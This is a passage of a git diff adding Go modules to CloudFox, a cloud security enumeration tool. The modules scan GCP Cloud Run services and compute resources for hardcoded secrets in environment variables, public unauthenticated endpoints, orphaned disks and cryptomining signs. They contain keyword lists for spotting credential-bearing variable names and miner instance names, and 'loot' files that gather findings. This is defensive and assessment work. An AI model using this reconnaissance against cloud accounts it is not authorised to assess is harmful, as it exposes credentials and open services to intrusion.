if m.secretsFound > 0 { + logger.InfoM(fmt.Sprintf("[CRITICAL] Found %d potential secret(s) in environment variables!", m.secretsFound), GCP_CONTAINERSECURITY_MODULE_NAME) + } + + if m.publicCount > 0 { + logger.InfoM(fmt.Sprintf("[HIGH] Found %d public/unauthenticated service(s)", m.publicCount), GCP_CONTAINERSECURITY_MODULE_NAME) + } + + if m.issuesFound > 0 { + logger.InfoM(fmt.Sprintf("[FINDING] Found %d security issue(s)", m.issuesFound), GCP_CONTAINERSECURITY_MODULE_NAME) + } + + // Write output + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *ContainerSecurityModule) processProject(ctx context.Context, projectID string, runService *run.APIService, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Analyzing containers for project: %s", projectID), GCP_CONTAINERSECURITY_MODULE_NAME) + } + + // Analyze Cloud Run services + m.analyzeCloudRunServices(ctx, projectID, runService, logger) +} + +func (m *ContainerSecurityModule) analyzeCloudRunServices(ctx context.Context, projectID string, runService *run.APIService, logger internal.Logger) { + // List all locations + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + + services, err := runService.Projects.Locations.Services.List(parent).Do() + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error listing Cloud Run services for project %s: %v", projectID, err), GCP_CONTAINERSECURITY_MODULE_NAME) + } + return + } + + for _, svc := range services.Items { + m.mu.Lock() + m.totalServices++ + m.mu.Unlock() + + // Extract location from name + // Format: projects/{project}/locations/{location}/services/{name} + location := m.extractLocationFromName(svc.Metadata.Name) + serviceName := svc.Metadata.Name + + config := ContainerConfig{ + Name: m.extractServiceName(serviceName), + ProjectID: projectID, + Location: location, + ServiceType: "cloudrun", + CreatedTime: svc.Metadata.CreationTimestamp, + RiskLevel: "LOW", + } + + // Analyze spec + if svc.Spec != nil && svc.Spec.Template != nil && svc.Spec.Template.Spec != nil { + spec := svc.Spec.Template.Spec + + // Service account + config.ServiceAccount = spec.ServiceAccountName + + // Timeout + if spec.TimeoutSeconds > 0 { + config.Timeout = fmt.Sprintf("%ds", spec.TimeoutSeconds) + } + + // Concurrency + if spec.ContainerConcurrency > 0 { + config.Concurrency = spec.ContainerConcurrency + } + + // Container details + if len(spec.Containers) > 0 { + container := spec.Containers[0] + config.Image = container.Image + + // Resources + if container.Resources != nil { + if cpu, ok := container.Resources.Limits["cpu"]; ok { + config.CPU = cpu + } + if mem, ok := container.Resources.Limits["memory"]; ok { + config.Memory = mem + } + } + + // Analyze environment variables + config.EnvVarCount = len(container.Env) + m.analyzeEnvVars(container.Env, config.Name, projectID, location) + } + } + + // Analyze annotations for ingress and auth + if svc.Metadata.Annotations != nil { + // Ingress setting + if ingress, ok := svc.Metadata.Annotations["run.googleapis.com/ingress"]; ok { + config.Ingress = ingress + } else { + config.Ingress = "all" // Default + } + + // VPC connector + if vpc, ok := svc.Metadata.Annotations["run.googleapis.com/vpc-access-connector"]; ok { + config.VPCConnector = vpc + } + } + + // Check IAM policy for authentication + iamPolicy, err := runService.Projects.Locations.Services.GetIamPolicy(serviceName).Do() + if err == nil { + config.Authentication = m.analyzeIAMPolicy(iamPolicy) + } + + // Determine risk level and check for issues + m.analyzeServiceSecurity(config, svc) + + m.mu.Lock() + m.Containers = append(m.Containers, config) + m.mu.Unlock() + } +} + +func (m *ContainerSecurityModule) analyzeEnvVars(envVars []*run.EnvVar, serviceName, projectID, location string) { + // Patterns that indicate secrets + secretPatterns := map[string]string{ + "PASSWORD": "password", + "PASSWD": "password", + "SECRET": "secret", + "API_KEY": "api-key", + "APIKEY": "api-key", + "API-KEY": "api-key", + "TOKEN": "token", + "ACCESS_TOKEN": "token", + "AUTH_TOKEN": "token", + "BEARER": "token", + "CREDENTIAL": "credential", + "PRIVATE_KEY": "credential", + "PRIVATEKEY": "credential", + "CONNECTION_STRING": "connection-string", + "CONN_STR": "connection-string", + "DATABASE_URL": "connection-string", + "DB_PASSWORD": "password", + "DB_PASS": "password", + "MYSQL_PASSWORD": "password", + "POSTGRES_PASSWORD": "password", + "REDIS_PASSWORD": "password", + "MONGODB_URI": "connection-string", + "AWS_ACCESS_KEY": "credential", + "AWS_SECRET": "credential", + "AZURE_KEY": "credential", + "GCP_KEY": "credential", + "ENCRYPTION_KEY": "credential", + "SIGNING_KEY": "credential", + "JWT_SECRET": "credential", + "SESSION_SECRET": "credential", + "OAUTH": "credential", + "CLIENT_SECRET": "credential", + } + + for _, env := range envVars { + if env == nil { + continue + } + + envNameUpper := strings.ToUpper(env.Name) + + // Check if this looks like a secret + for pattern, secretType := range secretPatterns { + if strings.Contains(envNameUpper, pattern) { + // Check if it's using Secret Manager (safer) + if env.ValueFrom != nil && env.ValueFrom.SecretKeyRef != nil { + // Using Secret Manager reference - this is good + continue + } + + // Direct value - this is bad + if env.Value != "" { + secret := EnvVarSecret{ + ServiceName: serviceName, + ProjectID: projectID, + Location: location, + EnvVarName: env.Name, + SecretType: secretType, + RiskLevel: "CRITICAL", + Details: "Hardcoded secret value in environment variable", + Remediation: fmt.Sprintf("Use Secret Manager: gcloud secrets create %s --replication-policy=\"automatic\" && update Cloud Run to reference secret", strings.ToLower(env.Name)), + } + + m.mu.Lock() + m.EnvVarSecrets = append(m.EnvVarSecrets, secret) + m.secretsFound++ + m.addSecretToLoot(secret) + m.mu.Unlock() + } + break + } + } + } +} + +func (m *ContainerSecurityModule) analyzeIAMPolicy(policy *run.Policy) string { + if policy == nil || policy.Bindings == nil { + return "unknown" + } + + for _, binding := range policy.Bindings { + if binding.Role == "roles/run.invoker" { + for _, member := range binding.Members { + if member == "allUsers" { + return "public" + } + if member == "allAuthenticatedUsers" { + return "all-authenticated" + } + } + } + } + + return "authenticated" +} + +func (m *ContainerSecurityModule) analyzeServiceSecurity(config ContainerConfig, svc *run.Service) { + issues := []ContainerSecurityIssue{} + + // Check for public access + if config.Authentication == "public" { + config.RiskLevel = "HIGH" + + publicSvc := PublicService{ + Name: config.Name, + ProjectID: config.ProjectID, + Location: config.Location, + URL: svc.Status.Url, + Authentication: "public (allUsers)", + Ingress: config.Ingress, + RiskLevel: "HIGH", + Details: "Service is publicly accessible without authentication", + } + + m.mu.Lock() + m.PublicServices = append(m.PublicServices, publicSvc) + m.publicCount++ + m.mu.Unlock() + + issues = append(issues, ContainerSecurityIssue{ + ServiceName: config.Name, + ProjectID: config.ProjectID, + Location: config.Location, + IssueType: "public-access", + Severity: "HIGH", + Description: "Service allows unauthenticated access from the internet", + Remediation: "Remove allUsers from IAM policy or add authentication", + AffectedArea: "Authentication", + }) + } else if config.Authentication == "all-authenticated" { + config.RiskLevel = "MEDIUM" + + publicSvc := PublicService{ + Name: config.Name, + ProjectID: config.ProjectID, + Location: config.Location, + URL: svc.Status.Url, + Authentication: "all-authenticated", + Ingress: config.Ingress, + RiskLevel: "MEDIUM", + Details: "Service accessible to any Google account holder", + } + + m.mu.Lock() + m.PublicServices = append(m.PublicServices, publicSvc) + m.publicCount++ + m.mu.Unlock() + } + + // Check for default service account + if config.ServiceAccount == "" || strings.Contains(config.ServiceAccount, "-compute@developer.gserviceaccount.com") { + issues = append(issues, ContainerSecurityIssue{ + ServiceName: config.Name, + ProjectID: config.ProjectID, + Location: config.Location, + IssueType: "default-service-account", + Severity: "MEDIUM", + Description: "Service uses default Compute Engine service account", + Remediation: "Create a dedicated service account with minimal permissions", + AffectedArea: "IAM", + }) + } + + // Check for ingress settings + if config.Ingress == "all" && config.VPCConnector == "" { + issues = append(issues, ContainerSecurityIssue{ + ServiceName: config.Name, + ProjectID: config.ProjectID, + Location: config.Location, + IssueType: "unrestricted-ingress", + Severity: "LOW", + Description: "Service accepts traffic from all sources without VPC connector", + Remediation: "Consider using internal-only ingress or VPC connector for internal services", + AffectedArea: "Network", + }) + } + + // Check for high concurrency without scaling limits + if config.Concurrency > 80 && config.MaxInstances == 0 { + issues = append(issues, ContainerSecurityIssue{ + ServiceName: config.Name, + ProjectID: config.ProjectID, + Location: config.Location, + IssueType: "no-scaling-limits", + Severity: "LOW", + Description: "High concurrency without max instance limits could lead to cost issues", + Remediation: "Set max-instances to prevent runaway scaling", + AffectedArea: "Scaling", + }) + } + + // Check for secrets in env vars + if m.hasSecretsForService(config.Name, config.ProjectID) { + if config.RiskLevel != "HIGH" { + config.RiskLevel = "CRITICAL" + } + issues = append(issues, ContainerSecurityIssue{ + ServiceName: config.Name, + ProjectID: config.ProjectID, + Location: config.Location, + IssueType: "secrets-in-env", + Severity: "CRITICAL", + Description: "Hardcoded secrets found in environment variables", + Remediation: "Migrate secrets to Secret Manager and reference them in Cloud Run", + AffectedArea: "Secrets", + }) + } + + // Add issues + m.mu.Lock() + m.SecurityIssues = append(m.SecurityIssues, issues...) + m.issuesFound += len(issues) + m.mu.Unlock() +} + +func (m *ContainerSecurityModule) hasSecretsForService(serviceName, projectID string) bool { + for _, secret := range m.EnvVarSecrets { + if strings.Contains(secret.ServiceName, serviceName) && secret.ProjectID == projectID { + return true + } + } + return false +} + +// ------------------------------ +// Helper Functions +// ------------------------------ +func (m *ContainerSecurityModule) extractLocationFromName(name string) string { + // Format: projects/{project}/locations/{location}/services/{name} + parts := strings.Split(name, "/") + for i, part := range parts { + if part == "locations" && i+1 < len(parts) { + return parts[i+1] + } + } + return "" +} + +func (m *ContainerSecurityModule) extractServiceName(name string) string { + parts := strings.Split(name, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return name +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *ContainerSecurityModule) initializeLootFiles() { + m.LootMap["container-secrets"] = &internal.LootFile{ + Name: "container-secrets", + Contents: "# Secrets Found in Container Environment Variables\n# Generated by CloudFox\n# CRITICAL: These secrets should be migrated to Secret Manager!\n\n", + } + m.LootMap["vulnerable-images"] = &internal.LootFile{ + Name: "vulnerable-images", + Contents: "# Container Images Analysis\n# Generated by CloudFox\n\n", + } + m.LootMap["container-commands"] = &internal.LootFile{ + Name: "container-commands", + Contents: "# Container Security Remediation Commands\n# Generated by CloudFox\n\n", + } + m.LootMap["public-services"] = &internal.LootFile{ + Name: "public-services", + Contents: "# Public Container Services\n# Generated by CloudFox\n\n", + } +} + +func (m *ContainerSecurityModule) addSecretToLoot(secret EnvVarSecret) { + m.LootMap["container-secrets"].Contents += fmt.Sprintf( + "## Service: %s\n"+ + "Project: %s\n"+ + "Location: %s\n"+ + "Env Var: %s\n"+ + "Type: %s\n"+ + "Risk: %s\n"+ + "Remediation: %s\n\n", + secret.ServiceName, + secret.ProjectID, + secret.Location, + secret.EnvVarName, + secret.SecretType, + secret.RiskLevel, + secret.Remediation, + ) + + // Add remediation command + m.LootMap["container-commands"].Contents += fmt.Sprintf( + "# Migrate %s secret from %s\n"+ + "# 1. Create secret in Secret Manager:\n"+ + "echo -n 'SECRET_VALUE' | gcloud secrets create %s --data-file=-\n"+ + "# 2. Update Cloud Run service to use secret:\n"+ + "gcloud run services update %s --update-secrets=%s=%s:latest --region=%s --project=%s\n\n", + secret.EnvVarName, m.extractServiceName(secret.ServiceName), + strings.ToLower(strings.ReplaceAll(secret.EnvVarName, "_", "-")), + m.extractServiceName(secret.ServiceName), + secret.EnvVarName, + strings.ToLower(strings.ReplaceAll(secret.EnvVarName, "_", "-")), + secret.Location, + secret.ProjectID, + ) +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *ContainerSecurityModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Sort containers by risk level + sort.Slice(m.Containers, func(i, j int) bool { + riskOrder := map[string]int{"CRITICAL": 0, "HIGH": 1, "MEDIUM": 2, "LOW": 3} + return riskOrder[m.Containers[i].RiskLevel] < riskOrder[m.Containers[j].RiskLevel] + }) + + // Container Configs table + containersHeader := []string{ + "Service", + "Project", + "Location", + "Image", + "Auth", + "Ingress", + "Risk", + } + + var containersBody [][]string + for _, c := range m.Containers { + containersBody = append(containersBody, []string{ + c.Name, + c.ProjectID, + c.Location, + truncateString(c.Image, 40), + c.Authentication, + c.Ingress, + c.RiskLevel, + }) + + // Add to images loot + m.LootMap["vulnerable-images"].Contents += fmt.Sprintf( + "%s: %s\n", + c.Name, c.Image, + ) + } + + // Env Var Secrets table + secretsHeader := []string{ + "Service", + "Project", + "Location", + "Env Var", + "Type", + "Risk", + } + + var secretsBody [][]string + for _, s := range m.EnvVarSecrets { + secretsBody = append(secretsBody, []string{ + m.extractServiceName(s.ServiceName), + s.ProjectID, + s.Location, + s.EnvVarName, + s.SecretType, + s.RiskLevel, + }) + } + + // Security Issues table + issuesHeader := []string{ + "Service", + "Project", + "Issue Type", + "Severity", + "Affected Area", + "Description", + } + + var issuesBody [][]string + for _, i := range m.SecurityIssues { + issuesBody = append(issuesBody, []string{ + i.ServiceName, + i.ProjectID, + i.IssueType, + i.Severity, + i.AffectedArea, + truncateString(i.Description, 40), + }) + } + + // Public Services table + publicHeader := []string{ + "Service", + "Project", + "Location", + "URL", + "Auth", + "Risk", + } + + var publicBody [][]string + for _, p := range m.PublicServices { + publicBody = append(publicBody, []string{ + p.Name, + p.ProjectID, + p.Location, + truncateString(p.URL, 50), + p.Authentication, + p.RiskLevel, + }) + + // Add to public services loot + m.LootMap["public-services"].Contents += fmt.Sprintf( + "## %s\n"+ + "URL: %s\n"+ + "Auth: %s\n"+ + "Risk: %s\n"+ + "Details: %s\n\n", + p.Name, p.URL, p.Authentication, p.RiskLevel, p.Details, + ) + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + // Build tables + tables := []internal.TableFile{} + + if len(containersBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "container-configs", + Header: containersHeader, + Body: containersBody, + }) + } + + if len(secretsBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "env-var-secrets", + Header: secretsHeader, + Body: secretsBody, + }) + } + + if len(issuesBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "security-issues", + Header: issuesHeader, + Body: issuesBody, + }) + } + + if len(publicBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "public-services", + Header: publicHeader, + Body: publicBody, + }) + } + + output := ContainerSecurityOutput{ + Table: tables, + Loot: lootFiles, + } + + // Write output + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + m.ProjectIDs, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), GCP_CONTAINERSECURITY_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/costsecurity.go b/gcp/commands/costsecurity.go new file mode 100644 index 00000000..f9f92935 --- /dev/null +++ b/gcp/commands/costsecurity.go @@ -0,0 +1,994 @@ +package commands + +import ( + "context" + "fmt" + "sort" + "strings" + "sync" + "time" + + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" + + "google.golang.org/api/compute/v1" + "google.golang.org/api/sqladmin/v1beta4" + "google.golang.org/api/storage/v1" +) + +// Module name constant +const GCP_COSTSECURITY_MODULE_NAME string = "cost-security" + +var GCPCostSecurityCommand = &cobra.Command{ + Use: GCP_COSTSECURITY_MODULE_NAME, + Aliases: []string{"cost", "cost-anomaly", "orphaned", "cryptomining"}, + Short: "Identify cost anomalies, orphaned resources, and potential cryptomining activity", + Long: `Analyze resources for cost-related security issues and waste. + +Features: +- Detects potential cryptomining indicators (high CPU instances, GPUs) +- Identifies orphaned resources (unattached disks, unused IPs) +- Finds expensive idle resources +- Analyzes resource utilization patterns +- Identifies resources without cost allocation labels +- Detects unusual resource creation patterns + +Requires appropriate IAM permissions: +- roles/compute.viewer +- roles/storage.admin +- roles/cloudsql.viewer`, + Run: runGCPCostSecurityCommand, +} + +// ------------------------------ +// Data Structures +// ------------------------------ + +type CostAnomaly struct { + Name string + ProjectID string + ResourceType string + AnomalyType string // cryptomining, orphaned, idle, unlabeled, unusual-creation + Severity string + Details string + EstCostMonth float64 + CreatedTime string + Location string + Remediation string +} + +type OrphanedResource struct { + Name string + ProjectID string + ResourceType string + Location string + SizeGB int64 + Status string + CreatedTime string + EstCostMonth float64 + Reason string +} + +type ExpensiveResource struct { + Name string + ProjectID string + ResourceType string + Location string + MachineType string + VCPUs int64 + MemoryGB float64 + GPUs int + Status string + CreatedTime string + Labels map[string]string + EstCostMonth float64 +} + +type CryptominingIndicator struct { + Name string + ProjectID string + ResourceType string + Location string + Indicator string + Confidence string // HIGH, MEDIUM, LOW + Details string + CreatedTime string + Remediation string +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type CostSecurityModule struct { + gcpinternal.BaseGCPModule + + // Module-specific fields + CostAnomalies []CostAnomaly + Orphaned []OrphanedResource + Expensive []ExpensiveResource + Cryptomining []CryptominingIndicator + LootMap map[string]*internal.LootFile + mu sync.Mutex + + // Tracking + totalEstCost float64 + orphanedEstCost float64 + cryptoIndicators int +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type CostSecurityOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o CostSecurityOutput) TableFiles() []internal.TableFile { return o.Table } +func (o CostSecurityOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPCostSecurityCommand(cmd *cobra.Command, args []string) { + // Initialize command context + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, GCP_COSTSECURITY_MODULE_NAME) + if err != nil { + return + } + + // Create module instance + module := &CostSecurityModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + CostAnomalies: []CostAnomaly{}, + Orphaned: []OrphanedResource{}, + Expensive: []ExpensiveResource{}, + Cryptomining: []CryptominingIndicator{}, + LootMap: make(map[string]*internal.LootFile), + } + + // Initialize loot files + module.initializeLootFiles() + + // Execute enumeration + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *CostSecurityModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM("Analyzing resources for cost anomalies and security issues...", GCP_COSTSECURITY_MODULE_NAME) + + // Create service clients + computeService, err := compute.NewService(ctx) + if err != nil { + logger.ErrorM(fmt.Sprintf("Failed to create Compute service: %v", err), GCP_COSTSECURITY_MODULE_NAME) + return + } + + storageService, err := storage.NewService(ctx) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Failed to create Storage service: %v", err), GCP_COSTSECURITY_MODULE_NAME) + } + } + + sqlService, err := sqladmin.NewService(ctx) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Failed to create SQL service: %v", err), GCP_COSTSECURITY_MODULE_NAME) + } + } + + // Process each project + var wg sync.WaitGroup + for _, projectID := range m.ProjectIDs { + wg.Add(1) + go func(project string) { + defer wg.Done() + m.processProject(ctx, project, computeService, storageService, sqlService, logger) + }(projectID) + } + wg.Wait() + + // Check results + totalFindings := len(m.CostAnomalies) + len(m.Orphaned) + len(m.Cryptomining) + if totalFindings == 0 { + logger.InfoM("No cost anomalies or security issues found", GCP_COSTSECURITY_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %d cost anomaly(ies), %d orphaned resource(s), %d cryptomining indicator(s)", + len(m.CostAnomalies), len(m.Orphaned), len(m.Cryptomining)), GCP_COSTSECURITY_MODULE_NAME) + + if len(m.Cryptomining) > 0 { + logger.InfoM(fmt.Sprintf("[CRITICAL] %d potential cryptomining indicator(s) detected!", len(m.Cryptomining)), GCP_COSTSECURITY_MODULE_NAME) + } + + if m.orphanedEstCost > 0 { + logger.InfoM(fmt.Sprintf("[FINDING] Estimated monthly cost of orphaned resources: $%.2f", m.orphanedEstCost), GCP_COSTSECURITY_MODULE_NAME) + } + + // Write output + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *CostSecurityModule) processProject(ctx context.Context, projectID string, computeService *compute.Service, storageService *storage.Service, sqlService *sqladmin.Service, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Analyzing costs for project: %s", projectID), GCP_COSTSECURITY_MODULE_NAME) + } + + // Analyze compute instances + m.analyzeComputeInstances(ctx, projectID, computeService, logger) + + // Find orphaned disks + m.findOrphanedDisks(ctx, projectID, computeService, logger) + + // Find orphaned IPs + m.findOrphanedIPs(ctx, projectID, computeService, logger) + + // Analyze SQL instances + if sqlService != nil { + m.analyzeSQLInstances(ctx, projectID, sqlService, logger) + } + + // Analyze storage buckets + if storageService != nil { + m.analyzeStorageBuckets(ctx, projectID, storageService, logger) + } +} + +func (m *CostSecurityModule) analyzeComputeInstances(ctx context.Context, projectID string, computeService *compute.Service, logger internal.Logger) { + req := computeService.Instances.AggregatedList(projectID) + err := req.Pages(ctx, func(page *compute.InstanceAggregatedList) error { + for zone, instanceList := range page.Items { + if instanceList.Instances == nil { + continue + } + for _, instance := range instanceList.Instances { + m.analyzeInstance(instance, projectID, m.extractZoneFromURL(zone), logger) + } + } + return nil + }) + + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error listing instances for project %s: %v", projectID, err), GCP_COSTSECURITY_MODULE_NAME) + } + } +} + +func (m *CostSecurityModule) analyzeInstance(instance *compute.Instance, projectID, zone string, logger internal.Logger) { + machineType := m.extractMachineTypeName(instance.MachineType) + vcpus, memGB := m.parseMachineType(machineType) + + // Count GPUs + gpuCount := 0 + for _, accel := range instance.GuestAccelerators { + gpuCount += int(accel.AcceleratorCount) + } + + // Check for cryptomining indicators + m.checkCryptominingIndicators(instance, projectID, zone, machineType, vcpus, memGB, gpuCount) + + // Check for expensive resources + estCost := m.estimateInstanceCost(machineType, vcpus, memGB, gpuCount) + if estCost > 500 { // Monthly threshold + expensive := ExpensiveResource{ + Name: instance.Name, + ProjectID: projectID, + ResourceType: "compute-instance", + Location: zone, + MachineType: machineType, + VCPUs: vcpus, + MemoryGB: memGB, + GPUs: gpuCount, + Status: instance.Status, + CreatedTime: instance.CreationTimestamp, + Labels: instance.Labels, + EstCostMonth: estCost, + } + + m.mu.Lock() + m.Expensive = append(m.Expensive, expensive) + m.totalEstCost += estCost + m.mu.Unlock() + } + + // Check for unlabeled resources + if len(instance.Labels) == 0 { + anomaly := CostAnomaly{ + Name: instance.Name, + ProjectID: projectID, + ResourceType: "compute-instance", + AnomalyType: "unlabeled", + Severity: "LOW", + Details: "Instance has no cost allocation labels", + EstCostMonth: estCost, + CreatedTime: instance.CreationTimestamp, + Location: zone, + Remediation: fmt.Sprintf("gcloud compute instances add-labels %s --labels=cost-center=UNKNOWN,owner=UNKNOWN --zone=%s --project=%s", instance.Name, zone, projectID), + } + + m.mu.Lock() + m.CostAnomalies = append(m.CostAnomalies, anomaly) + m.mu.Unlock() + } + + // Check for unusual creation times (off-hours) + m.checkUnusualCreation(instance, projectID, zone, estCost) +} + +func (m *CostSecurityModule) checkCryptominingIndicators(instance *compute.Instance, projectID, zone, machineType string, vcpus int64, memGB float64, gpuCount int) { + indicators := []CryptominingIndicator{} + + // Indicator 1: GPU instance + if gpuCount > 0 { + indicator := CryptominingIndicator{ + Name: instance.Name, + ProjectID: projectID, + ResourceType: "compute-instance", + Location: zone, + Indicator: "GPU_INSTANCE", + Confidence: "MEDIUM", + Details: fmt.Sprintf("Instance has %d GPU(s) attached", gpuCount), + CreatedTime: instance.CreationTimestamp, + Remediation: "Verify this instance is authorized for GPU workloads", + } + indicators = append(indicators, indicator) + } + + // Indicator 2: High CPU count + if vcpus >= 32 { + indicator := CryptominingIndicator{ + Name: instance.Name, + ProjectID: projectID, + ResourceType: "compute-instance", + Location: zone, + Indicator: "HIGH_CPU", + Confidence: "LOW", + Details: fmt.Sprintf("Instance has %d vCPUs (high compute capacity)", vcpus), + CreatedTime: instance.CreationTimestamp, + Remediation: "Verify this instance's CPU usage is legitimate", + } + indicators = append(indicators, indicator) + } + + // Indicator 3: Preemptible/Spot with high specs (common for mining) + if instance.Scheduling != nil && instance.Scheduling.Preemptible && (vcpus >= 8 || gpuCount > 0) { + indicator := CryptominingIndicator{ + Name: instance.Name, + ProjectID: projectID, + ResourceType: "compute-instance", + Location: zone, + Indicator: "PREEMPTIBLE_HIGH_SPEC", + Confidence: "MEDIUM", + Details: "Preemptible instance with high specs (common mining pattern)", + CreatedTime: instance.CreationTimestamp, + Remediation: "Verify this preemptible instance is used for legitimate batch processing", + } + indicators = append(indicators, indicator) + } + + // Indicator 4: Suspicious naming patterns + nameLower := strings.ToLower(instance.Name) + suspiciousPatterns := []string{"miner", "mining", "xmr", "monero", "btc", "ethereum", "eth", "crypto", "hash"} + for _, pattern := range suspiciousPatterns { + if strings.Contains(nameLower, pattern) { + indicator := CryptominingIndicator{ + Name: instance.Name, + ProjectID: projectID, + ResourceType: "compute-instance", + Location: zone, + Indicator: "SUSPICIOUS_NAME", + Confidence: "HIGH", + Details: fmt.Sprintf("Instance name contains suspicious pattern: %s", pattern), + CreatedTime: instance.CreationTimestamp, + Remediation: "Investigate this instance immediately for cryptomining", + } + indicators = append(indicators, indicator) + break + } + } + + // Indicator 5: N2D/C2 machine types (AMD EPYC - preferred for mining) + if strings.HasPrefix(machineType, "n2d-") || strings.HasPrefix(machineType, "c2-") { + if vcpus >= 16 { + indicator := CryptominingIndicator{ + Name: instance.Name, + ProjectID: projectID, + ResourceType: "compute-instance", + Location: zone, + Indicator: "AMD_HIGH_CPU", + Confidence: "LOW", + Details: fmt.Sprintf("AMD EPYC instance with high CPU (%s)", machineType), + CreatedTime: instance.CreationTimestamp, + Remediation: "Verify legitimate use of AMD EPYC high-CPU instance", + } + indicators = append(indicators, indicator) + } + } + + // Add indicators to tracking + m.mu.Lock() + for _, ind := range indicators { + m.Cryptomining = append(m.Cryptomining, ind) + m.cryptoIndicators++ + + // Add to loot + m.LootMap["cost-anomalies"].Contents += fmt.Sprintf( + "## CRYPTOMINING INDICATOR: %s\n"+ + "Project: %s\n"+ + "Location: %s\n"+ + "Type: %s\n"+ + "Confidence: %s\n"+ + "Details: %s\n"+ + "Created: %s\n\n", + ind.Name, ind.ProjectID, ind.Location, + ind.Indicator, ind.Confidence, ind.Details, ind.CreatedTime, + ) + } + m.mu.Unlock() +} + +func (m *CostSecurityModule) checkUnusualCreation(instance *compute.Instance, projectID, zone string, estCost float64) { + createdTime, err := time.Parse(time.RFC3339, instance.CreationTimestamp) + if err != nil { + return + } + + // Check if created during unusual hours (midnight to 5am local, or weekends) + hour := createdTime.Hour() + weekday := createdTime.Weekday() + + if (hour >= 0 && hour <= 5) || weekday == time.Saturday || weekday == time.Sunday { + anomaly := CostAnomaly{ + Name: instance.Name, + ProjectID: projectID, + ResourceType: "compute-instance", + AnomalyType: "unusual-creation", + Severity: "MEDIUM", + Details: fmt.Sprintf("Instance created at unusual time: %s", createdTime.Format("Mon 2006-01-02 15:04")), + EstCostMonth: estCost, + CreatedTime: instance.CreationTimestamp, + Location: zone, + Remediation: "Verify this instance creation was authorized", + } + + m.mu.Lock() + m.CostAnomalies = append(m.CostAnomalies, anomaly) + m.mu.Unlock() + } +} + +func (m *CostSecurityModule) findOrphanedDisks(ctx context.Context, projectID string, computeService *compute.Service, logger internal.Logger) { + req := computeService.Disks.AggregatedList(projectID) + err := req.Pages(ctx, func(page *compute.DiskAggregatedList) error { + for zone, diskList := range page.Items { + if diskList.Disks == nil { + continue + } + for _, disk := range diskList.Disks { + // Check if disk is attached to any instance + if len(disk.Users) == 0 { + estCost := m.estimateDiskCost(disk.SizeGb, disk.Type) + + orphaned := OrphanedResource{ + Name: disk.Name, + ProjectID: projectID, + ResourceType: "compute-disk", + Location: m.extractZoneFromURL(zone), + SizeGB: disk.SizeGb, + Status: disk.Status, + CreatedTime: disk.CreationTimestamp, + EstCostMonth: estCost, + Reason: "Disk not attached to any instance", + } + + m.mu.Lock() + m.Orphaned = append(m.Orphaned, orphaned) + m.orphanedEstCost += estCost + m.mu.Unlock() + + // Add cleanup command to loot + m.mu.Lock() + m.LootMap["orphaned-resources"].Contents += fmt.Sprintf( + "%s (disk, %dGB) - %s\n# Delete: gcloud compute disks delete %s --zone=%s --project=%s\n\n", + disk.Name, disk.SizeGb, orphaned.Reason, + disk.Name, m.extractZoneFromURL(zone), projectID, + ) + m.mu.Unlock() + } + } + } + return nil + }) + + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error listing disks for project %s: %v", projectID, err), GCP_COSTSECURITY_MODULE_NAME) + } + } +} + +func (m *CostSecurityModule) findOrphanedIPs(ctx context.Context, projectID string, computeService *compute.Service, logger internal.Logger) { + // Global addresses + req := computeService.Addresses.AggregatedList(projectID) + err := req.Pages(ctx, func(page *compute.AddressAggregatedList) error { + for region, addressList := range page.Items { + if addressList.Addresses == nil { + continue + } + for _, addr := range addressList.Addresses { + // Check if address is in use + if addr.Status == "RESERVED" && len(addr.Users) == 0 { + // Static IP costs ~$7.2/month when not in use + estCost := 7.2 + + orphaned := OrphanedResource{ + Name: addr.Name, + ProjectID: projectID, + ResourceType: "static-ip", + Location: m.extractRegionFromURL(region), + Status: addr.Status, + CreatedTime: 